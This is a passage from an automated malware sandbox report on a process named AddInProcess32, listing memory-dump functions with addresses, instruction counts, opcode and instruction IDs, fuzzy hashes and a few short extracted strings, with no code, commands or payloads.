                                                • Opcode Fuzzy Hash: c036d94983dfb94b4fdbee4b7f7e56924e7c7dcda9a82591a47b4b65a3de3cbd
                                                • Instruction Fuzzy Hash: 11912934E1061A8BDF60DF68C890B9DB7B1FF89310F208599D549AB295DB70EE85CF90
                                                Function 06A78678 Relevance: .1, Instructions: 126COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 433c514cc98aeb4650a0dfc86b6c6fe5b66ef1f84f9c9c6410e0040917966fce
                                                • Instruction ID: a69326a79d365a27742508efcc5e50165ad0b202be3029ac19aa996793584b62
                                                • Opcode Fuzzy Hash: 433c514cc98aeb4650a0dfc86b6c6fe5b66ef1f84f9c9c6410e0040917966fce
                                                • Instruction Fuzzy Hash: 26416B76E102099FDB60DF99CC84AAFFBB2FB84310F10493AE256DB640D734E9458B90
                                                Function 06A78668 Relevance: .1, Instructions: 96COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4a7f1bd3b175c6b544d128ce3cbad5b289d729eaa806faf9c8fb0fd92815bfcf
                                                • Instruction ID: 732e017610d4085a064f66617b32b36dc39d0f69e86d9150ce2ac238ab750965
                                                • Opcode Fuzzy Hash: 4a7f1bd3b175c6b544d128ce3cbad5b289d729eaa806faf9c8fb0fd92815bfcf
                                                • Instruction Fuzzy Hash: B8318C76E107059FCB60DFA9CDC4AAFFBB2FB84310F10492AE156DB650D734A9458B90
                                                Function 06A756E8 Relevance: .1, Instructions: 91COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a1af79de3c7f6576e66053487324e421761c00fda309238e3e44d513cebae8b8
                                                • Instruction ID: d1b740e24c081d1ebe1d9be2044efa884027d36bb2a8bcbeba90c67b186edddb
                                                • Opcode Fuzzy Hash: a1af79de3c7f6576e66053487324e421761c00fda309238e3e44d513cebae8b8
                                                • Instruction Fuzzy Hash: 83313B34E102099BDB55DF65D994A9EBBB6AF89300F10C929E806EB354EF70EC46CB40
                                                Function 06A756E7 Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cb8f95ce190048e74c093fbb161906eef73016bf3d225a289826fe2e44d2bf1
                                                • Instruction ID: 21024e4aecfbe43b510a280f27430ec12f123b2e4ead06a8b4ba93f995879507
                                                • Opcode Fuzzy Hash: 7cb8f95ce190048e74c093fbb161906eef73016bf3d225a289826fe2e44d2bf1
                                                • Instruction Fuzzy Hash: 32313C34E102059BDB55DF64D995A9EBBB2BF89300F10C929E806EB354EF70EC46CB40
                                                Function 06A756DE Relevance: .1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06b1de192736d5e0864fc93876a989e55ce58375f2855b8e74c87cd098e54a8c
                                                • Instruction ID: 52fbaa464b4fa8e6d639c8aa0fad1e33e7f14178462dae6cad067939f686ccb4
                                                • Opcode Fuzzy Hash: 06b1de192736d5e0864fc93876a989e55ce58375f2855b8e74c87cd098e54a8c
                                                • Instruction Fuzzy Hash: 8E313C34E102058BDB59DF64D99569EBBF2AF89300F10C919E80AAB350DB70EC46CB40
                                                Function 06A770F8 Relevance: .1, Instructions: 79COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4668f0c7faad00577667dd0fd57f574bd48eb3b3827f69cb94b8becdcae2737c
                                                • Instruction ID: 25d02e855840ec9eed0f6bf3169770956d2fcd206b031dd6d4924bfa6c3fa2e2
                                                • Opcode Fuzzy Hash: 4668f0c7faad00577667dd0fd57f574bd48eb3b3827f69cb94b8becdcae2737c
                                                • Instruction Fuzzy Hash: 3E216B76F10205DFDB50EFA9D981AADB7F1AB48310F108029E905EB364E730D8418BA4
                                                Function 06A77108 Relevance: .1, Instructions: 78COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 85f37980889553d151f97f46cf1cb7db2485bc6fccdff136f48f15ec4b9678c7
                                                • Instruction ID: 4623822d672bc23c992c3fdb3358fa7c1901b359783f00d385526c79e80392ed
                                                • Opcode Fuzzy Hash: 85f37980889553d151f97f46cf1cb7db2485bc6fccdff136f48f15ec4b9678c7
                                                • Instruction Fuzzy Hash: AE214C76F00219DFDB50EFA9DD90AAEB7F1EB48710F108029E905EB364E730D8418BA4
                                                Function 011BD030 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4170970203.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_11bd000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fa380b11dce30dee2815fcb97bc7b39d17e4c2f5044935841da8fc53cd4931a5
                                                • Instruction ID: e85802833edfa3818703a5b3080d6593cd78e90685ce25f8c3a47a3598eb4fde
                                                • Opcode Fuzzy Hash: fa380b11dce30dee2815fcb97bc7b39d17e4c2f5044935841da8fc53cd4931a5
                                                • Instruction Fuzzy Hash: DF21F271604204DFDF1DDF58E9C0B66BBA5EB84318F24C56DD9094B256C33AD446CB62
                                                Function 06A7A318 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d0f3eb2d9321bc8c888ddbaf57ff226e37ff6306bbfdcfe0889a7f7d1f0be3a7
                                                • Instruction ID: 3a584b3913f7674a437a0304facc81056ebec73bece992601ceeda18b006cb2e
                                                • Opcode Fuzzy Hash: d0f3eb2d9321bc8c888ddbaf57ff226e37ff6306bbfdcfe0889a7f7d1f0be3a7
                                                • Instruction Fuzzy Hash: 6F21C335F102149FDF94EF68E95069EB7B7EF84311F148429E905EB354EB309D458B80
                                                Function 06A766B8 Relevance: .1, Instructions: 63COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 51d2ea540aae3e8c79780fb99d5a1e57a193e78a125c9dada57ecb7e08c90556
                                                • Instruction ID: 61e6614ccf66cb4303fb657805ba799522244f357deb22dd77c693d63e28db52
                                                • Opcode Fuzzy Hash: 51d2ea540aae3e8c79780fb99d5a1e57a193e78a125c9dada57ecb7e08c90556
                                                • Instruction Fuzzy Hash: B311D331E002189FDF58EB68CD406DEFBB6EB89310F1085A9D405EB304EA31D984CB90
                                                Function 06A77218 Relevance: .1, Instructions: 59COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7458bbfa7dc0103c533561bad764afb0b977490dd5fad4685051bc1fa76f076
                                                • Instruction ID: fdd55098bc23127a10e08eafe76f4e21f8974c4cb417d171c3a210f395f6f7d2
                                                • Opcode Fuzzy Hash: f7458bbfa7dc0103c533561bad764afb0b977490dd5fad4685051bc1fa76f076
                                                • Instruction Fuzzy Hash: 7011A532F101149BCF54A678CC146BE77FAABC8610B104575E916EB358EE34DC028BD0
                                                Function 06A77450 Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6464b2f864c7efd36b0e86384d0ff02863373eca8ce64ac30f1462c7386424e3
                                                • Instruction ID: d77649fcebcd762b2c9dc7f995911ac8ef56d8e36ac8da4dceff81e51b102950
                                                • Opcode Fuzzy Hash: 6464b2f864c7efd36b0e86384d0ff02863373eca8ce64ac30f1462c7386424e3
                                                • Instruction Fuzzy Hash: 42012431B105104FDBA59A7C991172ABBD6DFC9710F20883AE80ACB355EE35CC028381
                                                Function 011BD02B Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4170970203.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_11bd000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction ID: 6fb3095d13b0faf7fa9b5cb82e0375ace36aab05c9da3e76fd4661fdd87da9ca
                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                • Instruction Fuzzy Hash: 0A11BB75504280CFDB1ACF58E5C4B55BFA1FB84318F28C6AADC494B656C33AD44ACB62
                                                Function 06A76ED0 Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 061d817f2ad9ca841432e75f051ff822040925e063ba9b4f289c9239a19d6b27
                                                • Instruction ID: cbb8d5b7937fbdd06969fb5f2e2ce38647cec72f4ce753c9a2e7c1a6f66d427b
                                                • Opcode Fuzzy Hash: 061d817f2ad9ca841432e75f051ff822040925e063ba9b4f289c9239a19d6b27
                                                • Instruction Fuzzy Hash: 8121CEB5D012599FCB40DF9AD985BCEFBB4FF08314F10852AE918A7210C374AA54CBA5
                                                Function 06A76ED8 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 416b9a8839df5937f577d90d1ced0a018f076ee61c78d4aa0e3467069d7f25d6
                                                • Instruction ID: d20fdd14f4f2cc20a2518c84f3d4176cef2e5c528b38e6769d6c2dcb1059a455
                                                • Opcode Fuzzy Hash: 416b9a8839df5937f577d90d1ced0a018f076ee61c78d4aa0e3467069d7f25d6
                                                • Instruction Fuzzy Hash: FB11CFB1D01219AFCB00DF9AD884ACEFBB4FB48324F10812AE918A7200C374A954CFA5
                                                Function 06A77207 Relevance: .1, Instructions: 52COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 041cd313d4e6927e5a22a9441901700a6cc19e8133719bd4822a2b68b1dec6b4
                                                • Instruction ID: fef8018229ad83f132d597eacae4948e23263c084b788e56f65b450bb4be039a
                                                • Opcode Fuzzy Hash: 041cd313d4e6927e5a22a9441901700a6cc19e8133719bd4822a2b68b1dec6b4
                                                • Instruction Fuzzy Hash: 7E01B136F101155BCF94A6789D116EF77AAAB88200F00047AE806E7258EE34C8028BD1
                                                Function 06A77460 Relevance: .1, Instructions: 51COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 091da3eab319465db37a97b0f461cf65142779fef6e7b38f52d6d3720cee1893
                                                • Instruction ID: d0c25dca5b5945370fdecade958026c785197ad560b6bc375640db930b6d8072
                                                • Opcode Fuzzy Hash: 091da3eab319465db37a97b0f461cf65142779fef6e7b38f52d6d3720cee1893
                                                • Instruction Fuzzy Hash: 7C01F431B104104FDB64EA7DD851B2BBBDADBC9B20F208839E50ECB354ED65DC024390
                                                Function 06A7D918 Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c296c8a2fe1f45abcbf6a59cccf4b689818171b0256aa84e99676c0197db7a9e
                                                • Instruction ID: f111a1cf2a632c26c057815477f52f5b35e72f27869216284619141be2861359
                                                • Opcode Fuzzy Hash: c296c8a2fe1f45abcbf6a59cccf4b689818171b0256aa84e99676c0197db7a9e
                                                • Instruction Fuzzy Hash: 2E018431B111545FDBA0BA38E96072ABBD5EFC5620F508838E44ECB794EE21DC468781
                                                Function 06A7D928 Relevance: .0, Instructions: 46COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 139a021c6e02e2d3fa6d54c2d75d3c4523fbb4641fcb8412e2787c0f700cf449
                                                • Instruction ID: 09b8b33d139a1fb137e995bd2a38b8e5e67beb9209565c6d14eaf61f1deea653
                                                • Opcode Fuzzy Hash: 139a021c6e02e2d3fa6d54c2d75d3c4523fbb4641fcb8412e2787c0f700cf449
                                                • Instruction Fuzzy Hash: 37018631B101104BD750BA3CDD61B2AB7D5EFC5620F508838E50ECB754EE21DC468781
                                                Function 06A79688 Relevance: .0, Instructions: 26COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b4251081ceacd2cf643181ef12b07fe1dfeee4382a78f389d17290c80b25b0cb
                                                • Instruction ID: d1dd17243d73ecd2c72a88959025ead2c4bc15cb9aba322b6230abe524bff2aa
                                                • Opcode Fuzzy Hash: b4251081ceacd2cf643181ef12b07fe1dfeee4382a78f389d17290c80b25b0cb
                                                • Instruction Fuzzy Hash: F1E09AB1E252889FDF10EBA48E5569B77B5EB02204F2049E7E408CF201E236CF0597C1
                                                Function 06A79698 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 747e0be1dba9796ba1351459c9b06ebf7bad7f96bb6b1074afaafdebbb323c34
                                                • Instruction ID: ad90afe272390d766c4dea5f40312b1f17eed34fb0a96dae2702d0575b1352ad
                                                • Opcode Fuzzy Hash: 747e0be1dba9796ba1351459c9b06ebf7bad7f96bb6b1074afaafdebbb323c34
                                                • Instruction Fuzzy Hash: 5CE0ECB1E25109ABDF50EAA48D4579B77ADD741218F2089A6D409DB201E676DA0197C0

                                                Non-executed Functions

                                                Function 06A7ACB0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1324371161
                                                • Opcode ID: ae6c247dcb8063d2dae95b7f62e1e5152844761cfa27ca66bdedf70d9df60bea
                                                • Instruction ID: 42b0ef7c5d3c413e042b4f4e58afcb024867dce29deceea5e5f8f3ab86dc4b52
                                                • Opcode Fuzzy Hash: ae6c247dcb8063d2dae95b7f62e1e5152844761cfa27ca66bdedf70d9df60bea
                                                • Instruction Fuzzy Hash: 25123C70A01219CFDB68EF65C954A9EB7F2BF88304F2085A9D509AB364DB34DD85CF90
                                                Function 06A7DF50 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1078448309
                                                • Opcode ID: c31636be0759ef97f5eb8bbcaa7733224184db1045f882298c09b3a872efcb6c
                                                • Instruction ID: 5ac73a219880934504750c3a6aabf18f5d2f92a50b6bb01f1508e218a6cc0890
                                                • Opcode Fuzzy Hash: c31636be0759ef97f5eb8bbcaa7733224184db1045f882298c09b3a872efcb6c
                                                • Instruction Fuzzy Hash: CA917F30A0020ADFEBA8FF65DE55B6EBBB6BF44344F2085A9D4019B394DB349C45CB90
                                                Function 06A7A6B0 Relevance: 7.9, Strings: 6, Instructions: 405COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1342094364
                                                • Opcode ID: a3b760842c4b2a81966cd6cbb1906c7247a595f0e59c83e0ea37413ed8a352ef
                                                • Instruction ID: 1488153c16a175ff7941ad67f78a79c73f38e8720958d0fa8d19079fc2d929ac
                                                • Opcode Fuzzy Hash: a3b760842c4b2a81966cd6cbb1906c7247a595f0e59c83e0ea37413ed8a352ef
                                                • Instruction Fuzzy Hash: 3AF14C75B01209DFDB58EFA4C950A6EB7B3BF84340F208569D5059B3A8DB35EC82CB80
                                                Function 06A7F030 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq$$kq$$kq
                                                • API String ID: 0-1342094364
                                                • Opcode ID: 88b2c61390d18cd7adc380b0fd4c8c10926eae4a8484698996629c240ba15def
                                                • Instruction ID: e2ffbffebb8b9998bdc6b965c5bd4046b46b4c2cd6e6274364f2d7c1d2058d52
                                                • Opcode Fuzzy Hash: 88b2c61390d18cd7adc380b0fd4c8c10926eae4a8484698996629c240ba15def
                                                • Instruction Fuzzy Hash: 7A719130A102498FDB68EF68D9406AEB7B6FF84300F204569D416DB754DB71EE45CBD1
                                                Function 06A7B9E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq
                                                • API String ID: 0-2881790790
                                                • Opcode ID: 3023ca53062fc3901564806c92e6901f6077bf2e2378396bc86e454b3256b10f
                                                • Instruction ID: 078bad39deb57c1a0ab49794302c3d6c3fd7154c812c8869e6261ac119f74618
                                                • Opcode Fuzzy Hash: 3023ca53062fc3901564806c92e6901f6077bf2e2378396bc86e454b3256b10f
                                                • Instruction Fuzzy Hash: 4FB14C70A11209CFDB68EF64D9907AEBBB2FF84304F248529D4159B395DB74EC82CB90
                                                Function 06A7BE00 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LRkq$LRkq$$kq$$kq
                                                • API String ID: 0-2392252538
                                                • Opcode ID: b74020672f379416f76bbdd2ec950ef4d43b9301ece2d31f087d8fc83c502e27
                                                • Instruction ID: c6c94b096af0190081067607bdd5b6aba8348f9a9fb9a8757af5acdcfdc45d64
                                                • Opcode Fuzzy Hash: b74020672f379416f76bbdd2ec950ef4d43b9301ece2d31f087d8fc83c502e27
                                                • Instruction Fuzzy Hash: 3251C071B002059FDB58EF28D950A6AB7F6FF89304F1485A9E5068F3A8DB31EC44CB90
                                                Function 06A7E2D8 Relevance: 5.2, Strings: 4, Instructions: 160COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.4175922612.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_6a70000_AddInProcess32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $kq$$kq$$kq$$kq
                                                • API String ID: 0-2881790790
                                                • Opcode ID: 6d7eddb5924b4d2c811613d7b57825d8329681eab80606ed2dc9f230de43bcd7
                                                • Instruction ID: 2edea48c384f6692e4154ba23727ce74dc10070f43fcaa56b7c326aaf7edd17c
                                                • Opcode Fuzzy Hash: 6d7eddb5924b4d2c811613d7b57825d8329681eab80606ed2dc9f230de43bcd7
                                                • Instruction Fuzzy Hash: F6518D31A10205DFDFA5EB68D9906AEB7B2FF84310F2485A9D406EB364DB35DC41CB90